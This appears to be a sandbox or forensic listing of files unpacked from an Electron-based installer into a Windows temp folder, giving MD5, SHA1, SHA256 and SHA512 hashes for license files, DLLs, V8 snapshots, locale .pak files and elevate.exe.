SHA512 b9ba2e20ec878e3acae93d8254e69374e391fd4a3d5c1833282c43896d123baa874f1088839f3bbcf05539eda0e2aeaef28d7742ab8e20ec788382501e2152b1

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA256 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA512 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\vulkan-1.dll

MD5 b91586bd80e057a7f62bdc4422744812
SHA1 a1df644421ece2e740e5bf0ed98b4f269fd85c39
SHA256 8ba72d98e0f78b77bda7816cd7232809d287310d34e0f1d7472b9d5fda2c6d02
SHA512 94f0a8e3e75e4803891c0fcb257052dbe0e7399772fc7a46ab802629f76ee580ed30b3678fa6bc3744c12cf9f3103bbc8276e88f6711278748148e9fbeef2053

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\vk_swiftshader_icd.json

MD5 8642dd3a87e2de6e991fae08458e302b
SHA1 9c06735c31cec00600fd763a92f8112d085bd12a
SHA256 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9
SHA512 f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\vk_swiftshader.dll

MD5 de2d91476e625278c30a5f69a1892e05
SHA1 4d707f6a801611fb437f5c1cba31b0909bf41506
SHA256 02c7f0b926c64f5a19a9aacd5f94ee00be4d576486592e18acc80c0a027b05ba
SHA512 d027407539346e5aedd527f5f71de45bace6295e96a7fbefbf273c930d64a791e488e4bdf6ef8db61fc19c80cac52a6e398c2973499c6fedb1e422c3ba71f532

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\v8_context_snapshot.bin

MD5 47014c0f81bad6d216c617c9c63bf040
SHA1 7bb483fdc5fed3c6ed437d9fe6e5023bc38201bf
SHA256 e1249d05bfc73c645b27d269f47b6923b33a3cf8088a8ca78b3b637c90f58178
SHA512 052d86cf3305a9e493bd2472e6b7ddab5e0291efd6d899984a79bae46e5fa4bd21157e19ab4a2591c9cff9069de568bad18c7baf4f35d117c77134e635466f87

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\snapshot_blob.bin

MD5 c9ab741bbef53fa0e84952b8891a5f5a
SHA1 e2dcb8d034e07243537c86371de0c52bce62cee1
SHA256 4d82fe1e642fe3ca7ad1a173f806088c0652ecfe9f0f6f6e246066e15a3431d4
SHA512 177b98a3090ecfe4b4598dfcd7e8b3ca49efafba4dbd8d6c6d0def462de47c3fabfde831725622783ddc177de982de6115178d9bd9830d918bb544a5a4c27fc9

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\resources.pak

MD5 bdfa339e708ea0f23ed3620adc4a2d64
SHA1 82a95b7b022836b6e888f53e69386570c05a1af2
SHA256 b66ae9eda4543685974d35d051d967538bc57d55c2577629007c534ff330e1e4
SHA512 ba87c70e1b6446e0a7b62da33d72a36ff92ee54fda64343262bc26afa8166174e76d058ec6d707cdebf2611858b3b4b7e21798febec53da02febd81ade4ce8f8

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\de.pak

MD5 b73344e5a72fca6f956dbab984c123ba
SHA1 0561073aa40a63a9ce9930dd18b18e12ff139b2b
SHA256 6dda3fa65232ca0bff7314f916942a2aa5d9be73a0b0c7a6d016eb34ea6fff5b
SHA512 e8a12da397369f23c102244b3f18f533ec79afa6978785566056bbfe07b10a21ff4973bf17aa829fff65609363988c033b0e48d4a82c846863377c08d8df009d

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\hi.pak

MD5 590e9e73df9cbd83cd87b9c03848fec9
SHA1 da125e60a5a2c51a2d6219d3f81688bd22237b59
SHA256 089b9dd31090a987515809a68d26f6eeb64cd9283934e3dcc48b151eec7d3ad9
SHA512 fd0e5d0f2063e12b711275f390428b88f98ffaf6043cdb14b13674ac1e4aa9f70ae820ae960132d7155daf9b1308238775c4702694ab53068cdc709c50f9186a

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\he.pak

MD5 6a02a37e1ca3215fa9ee0e1b0fbcf5e7
SHA1 89a8a126c0bbf536ac58e29fc50e045fb1b88220
SHA256 f5cf34ce58b7f0d450936981aa7ffa060821403e6768eee3746ea4ffc9193986
SHA512 6607eb2329b81f1eaf0ed3a564eddcb30e6ab59229f2fbf6fd3d2140ffaa8853a330eda627a4458ef6bb06f32c5183edda869e34cd4ead1f87f88d5c622c1a16

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\gu.pak

MD5 63a7fdc4eadf8ef1c35c72468a0ce33f
SHA1 e8d064f0e9c8a6a8c6ccb036711e292d011d9466
SHA256 e549ff4e5a094d04c2ce7bc6fd68bea1f03e935437bf164bebb6191c133fa70c
SHA512 0a097ff875132a984545ec677b04f97785f14c38a1df487cfb4722cdea07d14e1e88fcff7d58b82fa53f05f4eba779a95ef320b5a91692097726d0385a26a456

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\fr.pak

MD5 c3095ce1e88b0976ba7bef183d047347
SHA1 b14cfbf6e46ac1f189595fc09660178525301138
SHA256 66488dc10517b6e3638686be95b430477a39304e92ac45dfe62b58cae3a77272
SHA512 29f47b1eff4681a9a17a50d6e82d63c22fe7bfe4ceb79862e81d8cd9f96fa38e225978b4c4b1f8e55b220235b91652c776fa8d2e559c68942c6ccf402812a421

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\fil.pak

MD5 40bddaf97f64dfea9ebafc7f82166f80
SHA1 90d1fde3c0b27d2184f0353991259c2a92c7820c
SHA256 39a9d63736e7b4593fc6873ed3c19d45fbf9eb78a012bfdcee0fea5906ebc5b2
SHA512 d1e61c53e09a0dc50edf5aba5cf286a251ee88421aa2cd49332b70a5859646605ecb7d0bb97ea7242d14a18742e23da0a14c04b0b99b57a466ec87f4f66b897e

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\fi.pak

MD5 cc592d91ce8eabaa75249cb78b889376
SHA1 f2f0f7f105a17f3e4b1a97ed0e3c2e871c2c3eac
SHA256 b1cb0b32efa78fd8634652c74f298f1d5127f2363ef601cf000417e5c7fefd20
SHA512 58e2eaffe26d8fda8df43e7ebef449cfff1065e940c128efa0276511e34e96e52da9230f294b01d4ecd8ef606b792d372bff897d6d8bb67c31379418ce867d48

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\fa.pak

MD5 6458a239e994d8d18315deccd35389ed
SHA1 75c985f43503a6c44645786d46639a6b555ae163
SHA256 300fc1c735e92917a5ddf92feb812cbf3175d988ec7ad5955110248a1addbd34
SHA512 3062075b6be0c25c957ac88e537880bc25ff86b8ef0703a05209e9676e943e89476b7997394aeb25064e03a93be614fef535676e9cdfaf44b46035225b1b2cf5

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\et.pak

MD5 c76db3385190c6840315c4497e40258a
SHA1 34f1aef2ba2925bebc5dcdb70e5b6c1a138a5c46
SHA256 e8af084ef5e1062c5966dd7802074ac24f3672dc3c9b9c5453a397644727191f
SHA512 90a870369d307758b33d74e6213676d65c2d332f42577c8aff23d96b512f3c2a2bdace8d6d9007f88b9175eadc6f2ae28b498b1265550849ff9317465a37ad29

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\es.pak

MD5 f83d8f7f6108786c02c2edbf3d85f147
SHA1 57781d9d9eb7c90cdc71f78e25d0763045b6d29a
SHA256 5b929216ac823dbe2b0bb98e64db76519900e09a86c8513019325271c66ade0d
SHA512 12747a4a61cdd21cad6e3f768cb43b8bda5ec9de373337c191b6994b20acd676c9d0a6cde8410a1e18f35dd5d2d332ea1bb7e7f8f6fc4b73d8774559e33398f1

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\es-419.pak

MD5 b261b1efe945365588befdf68879040f
SHA1 616f44a5f73f0449b483f36ccf831db6474a10d2
SHA256 1380b9edc9cee4b505f12e8eefa288d8c746ca995b52ceaba27c7741ae8a5cd4
SHA512 9ea14234b9d4d09364e5727b3886fc14544d52508b3e45fb9fd607ca88d2e432361a02b2f7ba34c3d6ecd94b91f9eccd4d54047a97a1ba4eea580ead00b91cff

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\en-US.pak

MD5 0bb857860d8c9ab6d617cea5a5bd4d00
SHA1 351b744d95846bff2ce5f542fec2e87439aa0f8b
SHA256 5c56df9699fc7e8f09ec81421e50a6264cde055e822f5a8cd9bb1edb3066d816
SHA512 33fb73cffbb6781488cedbca4c92a7e4f66923a799beeb7f5cba58dbc23ba8f5130f63a7dac7114e3c3ef6f1df87884fbeb8858bc7604aec9449fdfd16c25078

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\en-GB.pak

MD5 52e2826fb5814776d47a7fcaf55cb675
SHA1 51fbbc59dcd61116cbc0a24b0304d4c1c58e8d0b
SHA256 83ff81c73228c7cadba984d9b500e4fce01de583ecde8f132137650c8107c454
SHA512 69257f976d01006c5f3d7e256738c97c59115471f8e7447cfa795f7fa4ff12d6fd19708e95ffb2aa494b50c1763fe35d5885b9414112d2934baf68fe668ed7cc

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\el.pak

MD5 38440b98bfdf5ed496da0f49d59534c0
SHA1 1498d9207ecaf4923a47271e24c68a817041c82e
SHA256 b1f78df8a7edc914357a2e90bc8dc0ac46f4df642bb22894569fe4905fb8ea0f
SHA512 95ba788fc2e1f07d54e398f1ec4d32c664cfb13118d46cb7af7a993367e032b10de84f3e604ab6e659d6410e2d736097ec5e9b3b002040c54412358f0ea10229

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\da.pak

MD5 55a8f5883805a65c854d25edb3959209
SHA1 d4b3b6bd2a26cbd021fa931d1f63c9ea64e2c268
SHA256 e190187adcbb5f829d162660968ba598ed17bd11339062ca4d807deec8a27fdb
SHA512 4e1f9e6da32f553cbc8cf162726d7aba9e23e2216d6d05b995cf19fff3aafa05ed08fce29b2f8538d46583366402b8630672e650dfbd46952a611e9db0d8016d

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\cs.pak

MD5 3cfd9dc564cfcc33cc5524711365c376
SHA1 2e5016d2643017f37658262122974429f18625a2
SHA256 8be34e4f8226c1dd4e725711ddd884ef4476560f7863edcf378573dde9db3cee
SHA512 6ee156d2fa3b6f601df28e38968d0eae2812d70b41333348dbecd833d5ee6ff944183f0eecde96be433cf1e98c8ec22d6a6d5af5153145842175ab43c73533ef

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\ca.pak

MD5 423651c45566cd90ea5edd8631e823b8
SHA1 13bed4173a08bcbfefba034aada3d838eece6d16
SHA256 7a39af99d55a1ea838d8d78c5f0da3e1402f9404d32255e31b676ceed4f0e414
SHA512 e09085023beaa37e9d5f7fdf3c32d0c001672b85e2826f0aba9a662ce958ac93cac17bf63495a604e47cb407b1593049388a4bf1b22b2339ead84a206a10569f

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\bn.pak

MD5 47c95e191e760dee3ef43345577e2379
SHA1 609634315270a91d4ec631642b18bd0036367aad
SHA256 ceed32e429ed1018d4c49343cf52105cbfd1e877c531a5738fd6e6cd33d27da7
SHA512 46b5f8d58780d19e79136c31a67d075c57ddf7e6a1eb197dea4088cc414a0dc24a68fc8ebcaac03b3940af2461123b586706d5dbf8dbdf6fbea0f7bec466db21

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\bg.pak

MD5 5ba0c7200362c9ed55610cc8b66ef53c
SHA1 d45239c2f1b00885407771a41a7776fc1fe8fa3b
SHA256 2339ff55464b4ff704fc3c5bf281eec52a539c494bd059cf0346d9c05ab7cda7
SHA512 6229dbf08a9322c4ec8de4912aa1832f01800a71b7e3ef5870e7fa2b623be4dd248fec4881c3e031e984616147be84d42ab3dd970ae56dc1bd78913a8682a37a

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\ar.pak

MD5 6f3e791b4d35ee7d9515614d128752cf
SHA1 181ec3a84fb3e89336d77f24f562a2cbe07619d8
SHA256 e9df0fa338b763a3926c4ee3a87bedf650fa618b6fcf0560c3f5ffe891d48c60
SHA512 3657e610d13a2c938558ec320c298dd490c9e4895ccd304f738aaa2f050373efd7382ca402365f93d23ed488bae82de2d859da788dc8faa8e621346a278f4441

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\am.pak

MD5 e18a450ef034b42599341c3d09f280f1
SHA1 2001c8a85904962ac3a96938eccc69ad2c110fdf
SHA256 7c2b9098130f1f9e0cf4507b64c0e96ac6354bd6c3616be20e2067cfccc820da
SHA512 ddd87571218fe9f179a6c2a8a15b182625a71a7c19ed90c0969ca2e0e9bad823b926f8b8a6b390cb6fe9c95f4b6c1f1ec7b5167a8424ab1921943922208f798a

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\LICENSES.chromium.html

MD5 df37c89638c65db9a4518b88e79350be
SHA1 6b9ba9fba54fb3aa1b938de218f549078924ac50
SHA256 dbd18fe7c6e72eeb81680fabef9b6c0262d1d2d1aa679b3b221d9d9ced509463
SHA512 93dd6df08fc0bfaf3e6a690943c090aefe66c5e9995392bebd510c5b6260533b1522dc529b8328dfe862192e1357e9e98d1cdd95117c08c76be3ab565c6eea67

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\ja.pak

MD5 833e8c4aa70351b6be7bd403e4e9a0a7
SHA1 46ccdbdea35deec8ef13a5fc833776875fad187b
SHA256 74422db1a5f28522f9a8b31a3bee9a6df794b419bf723cb6a6c88e82eb72cec0
SHA512 e8e709612a5ea81d2822e0025b7306f38571f2cec2ca72ac5a8ab852a0e36a0f5bc7e00d0baf7ac7becc2c54dda3a17c52ec1cd67ce12b14d91b6ae0b726d556

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\it.pak

MD5 5aa225aad4f9fe6d05ec24905a827d88
SHA1 f6d5ed337bd8e9cc3b962d3a498e3430fbf6de22
SHA256 96e02ab6937a1f1cb58762159761a737ce0e1dcd6a253554392baf4389326eab
SHA512 3fa928f19bdf65b8fbb274b478a801821b15c01224c113a8d7f6121a077b432c0cc84eefd9028a76adea9fa4bb65dcb868edfbd4368b1e4d477c49e187e4288a

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\ms.pak

MD5 6cfadaa784e687e6dadbcd80e631bc9b
SHA1 481acb75f525055bf4e45ecabe0eadcb9c492106
SHA256 fb5e125dd5e1f21e8df229d22cb3d1f9078bd79bbddca352899248f2a8b21b71
SHA512 0d7da5a90fe9372bc704ab8cdc8cbfb14d323cafdef856987e2d9e34d980196c03985e25099f5d1bcb10c97f040f4766e2c3713718649bb3f43914a77f0dbb39

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\pt-BR.pak

MD5 88ad860c73676ffb4025b5c691f29942
SHA1 3c5e5b999ea7153ccdd1b4cc7b6162de3456b558
SHA256 25f0bb0b0230d99a9064d52668636f3be85903bf27a68124d79a2fe93c30fe0e
SHA512 41589bb9ab1b8307f62ceb4e6493d7903731a3e63807e0044379c4acdda881c21839234f5f1b8ad1af732bfee6231c0556ce92e582505379ed949980185bb750

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\pl.pak

MD5 644c0ace25d6e532b56510a736c6bc2c
SHA1 1bd0fec952107b493da04c46423da634ff3e1504
SHA256 2ff9e382a31783285b7d85676e629e2f6db26bb9536ed17b7fbe5ac61a895ec7
SHA512 9a1f1e884c2f214b8b0c63543809ddd4ba0fd533f1d8434e926051f3db434f60cc4df2462c2a43254b2a9685b3869eef49463c212892e417c82c3a7b497e3559

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\nl.pak

MD5 cf6b1cbfd669e9461553974ba37a475e
SHA1 b33867e9bc7fd88ca98a76dc4bd756bcf18887aa
SHA256 9a83ad866ad7fd9d65ecbc1e95c276cfce27e8257c76a16950fd14971e66b864
SHA512 e463029bb37f6bb3ff5cb6281f64291ada1b785fa33137e7aedfc7b5e409e99c75a91e7cf9b6c0933e970f70c14861190de66fc5d68925b687a6f5da02e21077

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\nb.pak

MD5 b61e42f66d581b6a8929cdf5fb10662e
SHA1 6f06fa9ee092fbcb61bbd668734fb3b92cfb549a
SHA256 1b17dcde8fc7308d926fbe0faa83dfc9ffe2efc5715e9afd557dde839ad98b7e
SHA512 79b82346c3f133a6ba44148a8432ad4e08e2805187b759509cb386bc800fd20215592c07d953812c243f0b1d5e1354245f2cb42b2b3eb6c87280bcb4008dbe97

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\mr.pak

MD5 f22c99fe6a838e333e8ee06a4d01296b
SHA1 c3542ea8dd45a2b387dd02fa5687948f135e10f2
SHA256 b03a3042f907aed13253ae8083d08f5fad59ff438d024b097276856e72526911
SHA512 882022c2cb985d85f96d52c9bcfeeb089d6ff30e66187ccf424ef622092b9d359a51bdef1fb6ac3b9d3409aa79d37ca737ba7f3ed8b9cdaabfe04d90a7c8bc15

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\ml.pak

MD5 04b2540c25990a5e0a9b227dcce6ae0d
SHA1 4f8ccd154f54dfb083d4d1a3ed0994842c8ab13e
SHA256 556165b8b54c6e21bc66d12b3f5be393136714467c427f7114f314d18ad3c661
SHA512 4cab47e42e8f5d4a83851871f97f3e1360c993ba530dbb4b4b736350779784bd83189e1195d3480ce87298bb8f9b7f249fefa7764d850e5b0002895609626785

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\lv.pak

MD5 264c6e20b3088ceb4dae5773cef0cb55
SHA1 fb6ff83ff14df008092bc3ee73bda7491e8e090e
SHA256 a676a781c1a587eadf23e5c69bc52f2d352346a70bc53ca908450362535eefda
SHA512 01e949f92e1e8599c581929a601d39640abaf1d907ce10102e591c3d490dd3874c679c75bb51308ead55a3bd0c6dcd1b8d4b2daf98ce1cf1c6bab42946e8b1e8

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\lt.pak

MD5 2d4fca437a7548893dc4b51fa5b33c33
SHA1 c1493013d7d981ea9223716e415380992de65c2f
SHA256 776dba792df7b444e1b720326312d8b8312cade74a1372c49456d932b7c65769
SHA512 b6a55ee1deff48d717a3e9399aef3c45eeec810cc5b5709fa3e9f56850115a5b02e02b7959ec77a6797e68516ee9372bacd260e62ac0d55a8e4c1c27af782b42

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\ko.pak

MD5 d6e2c18c9eabba59b50d147d942125ea
SHA1 0918879203c2050b4f9f449f5616e430897ba0b9
SHA256 f3581cea2e5b022b121010ffc5d67f86f717e3a0c0402abd81e24c87fd135b76
SHA512 f605f7b9893166778af156f9eb76eaa1209e7432450899540cd462ce0ffa69caf6f570b910cdd6d7bef54354379e9892a658e711baa93241da33755c107da859

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\kn.pak

MD5 5115cde84b4c674db412619b65433004
SHA1 164f33e7e2e9f685a579da492a6fc8806beb6cbf
SHA256 891e092c6895e23be986c3e6d39dcea9b6b75f1448239c13fd406680e50407a7
SHA512 090a247898cb533325d2b289a6cbd8db2a755ef0abab49d82f333e57b290c50b5996b81f15d8adc30160b216eebed3a1476aec1627195e52189557c1d48b0216

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\id.pak

MD5 e40cb2f3b4db379e4d187aeef0dfd300
SHA1 537b1ebc615c980c89bbe2b9e91a11199fa7d6a6
SHA256 3339ef011c9bb64868da94adb25f4490acbc7f893e4337dbfe2797754cd659f5
SHA512 b87464460077aa55feb92eca8ed23d9a61829378bae7890c8a95dac5fcd735b145d65661f27facfe2586fcaa169692b00d8ee8dd505dc44bff7f7fd090f3e96c

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\ru.pak

MD5 75457b95d2bb03891232dae7db886387
SHA1 e5a7569df7f91533703626d167ecc8cddbd27205
SHA256 e0894d3aa3f8e0f8ac457a3300001d4e1dcf95980712f8c8e9c845eb4c2bbfa6
SHA512 9813239cb162cec24cb81cffdae2df06889782813d917da186ae40df6dae64477467e4b32ead2d714bc1de671538d4c1fde990d83d3ee69e0932f17226687a78

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\sk.pak

MD5 b35daa0bd9627ca88b413a5af7c6b4a4
SHA1 d5efdcbc7ca17de29f3075f6434f31ab2e895826
SHA256 f47bc1f7f5ab64681d0b152e1a019da60f0ef057ee8bf2ccede019dc4030c177
SHA512 48abb6ca2290820db2898b05820bb25e70fb1292c816eb0c8f17b3c5452de9fff7027d216d2bf413900f408f44ed4ac99151b28142a212c5cff8dfe229e87b9b

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\sr.pak

MD5 af7083f2a4bd95dcbe792efade352662
SHA1 dc69aa831836016f6e66c6079931503d534a7862
SHA256 e3b80d9fdd420a05d66cc12e685ac94500106dd51a555bbfa2d085094f81e8dd
SHA512 342400ba94f6cd08152f96aa2b905184fab429c38cedb4bcb4ac0c503169a9ecd47aef208b4d7ffae08b0c0afa7aa089347a20739379d05f3e4e111be842b8c4

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\sv.pak

MD5 41e76f7775fc9a2d6e3c02c46e9b32f6
SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\te.pak

MD5 793a87d41cde6e6d1bb086284f69733b
SHA1 d887e3842b664f55b7308427aa6f5bf0b352d879
SHA256 5cdabd1ad41e8048f2cc6b1615e68b99159daa1aa6706b939447c1811bf0e255
SHA512 7c2e53baa387480eed45315bd9d53856ca46e5777ecdc9c29a0de7b0ad04beb6cbb8b5df0aa7c306395fda563037e06bea1ca70e433ce5a3ccc2ec184dfda972

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\vi.pak

MD5 69c8796439192577f48bd249175aaf37
SHA1 97c52088ca69dada593db0e42b2135d264646454
SHA256 d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2
SHA512 65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\uk.pak

MD5 d791b1ecf2931b2fb0c31aac170c7cdc
SHA1 02be115a9ff94fe5250651b6de4323eafc44fce1
SHA256 ffae6286d44c8e219ef90d411ad8746159a6ff8ea610e2a651147a3956696a22
SHA512 3a2edb8069e4a9734ce5e02b7c3de3c968c5bbc116f17f52f97e2bb2c78485c456c4f0cc952686c1aa17b7ee4d326a1dda698afafc63c79d842ca3905181a8da

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\tr.pak

MD5 40491896ad21543f339467186c5efb40
SHA1 695dde7cc35056dcbf0a533aff8299d4c6b61bd8
SHA256 43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa
SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\th.pak

MD5 43edd25f67ce6e6cea5373009ff0a1f8
SHA1 ed72ca6620cf23837e1334be50ccf616806bc5a2
SHA256 287897cf3df2db1cf59b872e6575ba8dfcaa0c1f68c17a9c91da6c4490adb8b0
SHA512 7160a72bd2e6b0ffa71e5d279995cc8be24a87cd9386eb29ab0eee79b8e607f5d824a11b6b4e3ef4c0f851a9d485a9642cb6adaa65c07933dca6e6f2c0052fc7

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\ta.pak

MD5 31dada843d0b4f9a66b184cb6d7b8b92
SHA1 0320b31981043c6e4c17470bf2ff4c7488553511
SHA256 457070b35c813175f5a7b630478073e478ff2bf23915dd3dc7a5b3b339cc2b0b
SHA512 c5b6ea595d3154fd9fe03f49a19f78eb4068718ce005b18a165d491459a290c29956b02a109ce2c314746773760c8e5c0d7064f384c65a572c78109f03538860

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\sw.pak

MD5 99e385ebc1ef8d3daddb3a171fa79edf
SHA1 3164804dfe9d9b5e891abafe92e5ba67d2b5d4d1
SHA256 8ec45ac391a085d531fb21815086c2da4841aa016653cb4f8484cfc2615d6c01
SHA512 797c105fecef1e15870aa101e3fa1835d5a467a9059c03b3636c54934d1de263ab7f23599e21d9787cb3849c7cb7d29f5bdd8ae9ad10fda8015c1392462e94c0

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\sl.pak

MD5 e015b6f5042be2dc96a4e23dcf035502
SHA1 7946509eed8db1e4c1f3da99ffe7155c86fdb4d6
SHA256 99536d1bc73eec81d5bebbff641ea195544ee5e3a41bb17ddcedf9cde9b141d4
SHA512 b2a2eaae93c506a053862bf1cde02eee53b3ea2e2fe4c964c51dbacb8b44de820a779311cfe01458e2f08f88bce1172e8c5e1e6d28cd3a355ff84baa00023b8f

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\ro.pak

MD5 24b01a438a3ab9699d4ca97c081b5e82
SHA1 0d0b082544d23425a74199fb0a6c11192f0bdf7d
SHA256 38290b1c9712296d82ea1681ef95544a1eef4872289134b11e50af735e6deaca
SHA512 43199772312156f4633c4202499cde8f808e5e632c2013ec1129acee01a3f184e86df2616626173178efe04b6f0773ad9a0e8b8cc6a735d23d68dcfe9dfd945b

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\pt-PT.pak

MD5 ecd84b296d3bb312ee18e21017311986
SHA1 f5625523f85c10723750834a54ff59a2dd886fb3
SHA256 fcfaa9c44c445876c286388b6a1abc1df949f3dda3d64fb57d6e0d54a05cdb94
SHA512 e95b74238220024cdd0bd1c0f18beadbbe427d76cd8d6b32d5700adcd34ffb068ad0bf75404921485c8077f395f5111cd40d5dfe2b5b8f34c62e6fc80b507456

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\zh-CN.pak

MD5 098d656a4f4bd8240bed10e7678186c7
SHA1 0c19ab62b4262f1b51558e8aaa79e7741f73393a
SHA256 a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7
SHA512 084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\zh-TW.pak

MD5 c2c35fcedc3708b5bcadf36587393002
SHA1 31d72402cbd44ceb921cedd806259c2cd14e411f
SHA256 cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac
SHA512 9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\hu.pak

MD5 71d42cb22d2d7a8b26c4514ab12df3aa
SHA1 cd0307503a7906f1742d1e98fc816959319c2171
SHA256 b51bcb888dbc27bab88a8c9d081df7496de8a9a5a4cd2cfe08abc154190e75e6
SHA512 29c67391bca706807be3a0cc79fe481f220e30263957a9c2485f0a4c498a5b250bdd83b5f4fad8d0b19c8a9a07d5650b5ebd5816b6aae311a1cde78a89303244

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\locales\hr.pak

MD5 6f92235e6ba003af925a2d6584afd27d
SHA1 3ceba61e9c2975466b6244188f5ea72aaf042fc7
SHA256 479dc4f75a889d45f62b4ddb6eb48f21c473e37875468c9c26d928a263e15840
SHA512 82f2642dff4400704c15c2fa02d0ec74ed3fe888dc835447c1afce7463dee8f480bb81be358c306e681625864a6d25e5cd6c96252b8a56e6fc62014b3aa4d26a

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
